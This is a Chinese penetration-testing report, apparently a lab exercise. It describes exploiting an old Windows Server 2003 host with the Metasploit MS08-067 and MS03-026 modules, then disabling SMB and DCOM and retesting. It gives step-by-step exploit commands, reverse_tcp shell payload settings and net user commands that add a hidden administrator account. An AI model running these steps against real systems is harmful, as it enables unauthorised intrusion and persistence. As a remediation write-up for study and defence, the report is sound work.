网络系统漏洞安全攻防
目录
一、 事件描述... 2
二、渗透测试... 3
1.查找漏洞... 3
2、渗透测试... 4
ms08_067渗透测试... 4
ms03_026渗透测试... 9
三、漏洞修复............................................................................................8
1、修复ms08_067漏洞... 13
2、修复ms03_026漏洞................................................................ 14
四、漏洞复查... 15
1、ms08_067漏洞复查... 15
在对公司网络进行维护的时候,发现公司的服务器群中有一台年久失修的服务器要进行报废处理,但里面有一个重要文件,由于太长时间没人进行维护管理,主机的用户名和密码早已丢失,为了获得这个文件,需进入这台服务器。
首先使用metasploit内置的nmap扫描器对服务器进行详细扫描,
在msf里输入命令db_nmap -p 1-65535 -T5 -A -v 192.168.124.132
从扫描结果里可以看出,服务器一共开启了了8个端口,分别是21,135,139,445,1025,1026,1027,3389,且服务器的操作系统版本为Windows Server 2003 3790 (Windows Server 2003 5.2),smb的版本为一。
从第一步的扫描结果可以看出,服务器操作系统的版本较老,且开启了135,139,445等敏感端口,因此决定使用经典的ms08_067和ms03_026对其进行渗透测试。
因为服务开启了445端口,因此决定使用ms08_067对其进行渗透测试,在msf里输入命令useexploit/windows/smb/ms08_067_netapi进入ms08_067的渗透攻击模块。
在msf里输入命令setpayload windows/shell/reverse_tcp设置该渗透攻击模块的攻击载荷为反弹型tcp连接
在msf里输入命令show options查看该渗透攻击模块的详细参数
在msf里输入命令set RHOST 192.168.124.132设置远程主机的IP地址为192.168.124.132
在msf里输入命令set LHOST 192.168.124.1 设置本地主机的IP地址为192.168.124.1
在msf里输入命令 showoptions验证输入的结果
在msf里输入命令exploit开始渗透攻击,从返回的结果看,本次渗透攻击成功反弹shell。
在反弹的shell中输入命令net user test 123456 /add 添加普通用户test。
在反弹的shell中输入命令net localgroup administrators test /add将test加入管理员用户组
使用远程桌面登陆远程服务器,成功登陆,本次渗透成功完成。
因服务器开启了135端口,因此决定使用ms03_026对其进行渗透测试,在msf里输入命令use exploit/windows/dcerpc/ms03_026进行ms03_026攻击渗透模块。
在msf里输入命令setpayload windows/shell/reverse_tcp设置该渗透攻击模块的攻击载荷为反弹型tcp连接
在msf里输入命令show options查看该渗透攻击模块的详细参数
在msf里输入命令set RHOST 192.168.124.132设置远程主机的IP地址为192.168.124.132
在msf里输入命令set LHOST 192.168.124.1 设置本地主机的IP地址为192.168.124.1
在msf里输入命令 showoptions验证输入的结果
在msf里输入命令exploit开始渗透攻击,从返回的结果看,本次渗透攻击成功反弹shell。
在反弹的shell中输入命令net user test 123456 /add 添加普通用户test1。
在反弹的shell中输入命令net localgroup administrators test1 /add将test1加入管理员用户组
使用远程桌面登陆远程服务器,成功登陆,本次渗透成功完成。
三、漏洞修复
因ms08_067依赖于445端口,且目前业务无需smb服务,所以决定关闭445端口,打开注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters 新建DWORD值SMBDeviceEnabled为0
重启系统, 即可关闭445端口
2、修复ms03_026漏洞
因ms03_026依赖于dcom服务,且目前业务无需dcom服务,所以决定关闭dcom服务。打开组件服务,在 控制台根目录\组件服务\计算机中 右键我的电脑属性,在默认属性里将“在此计算机上启用分布式COM”前的勾去掉,重启系统,即可关闭COM服务
配置ms08_067攻击模块
在msf中输入命令expolit开始溢出攻击,从返回的信息中可知溢出失败。
2、ms03_026漏洞复查
配置ms03_026攻击模块
在msf中输入命令expolit开始溢出攻击,从返回的信息中可知溢出失败。
五、总结
通过此次对服务器的渗透,成功拿回服务器中的重要文件,同时通过对服务器漏洞进行修补,提高了公司服务器的安全性。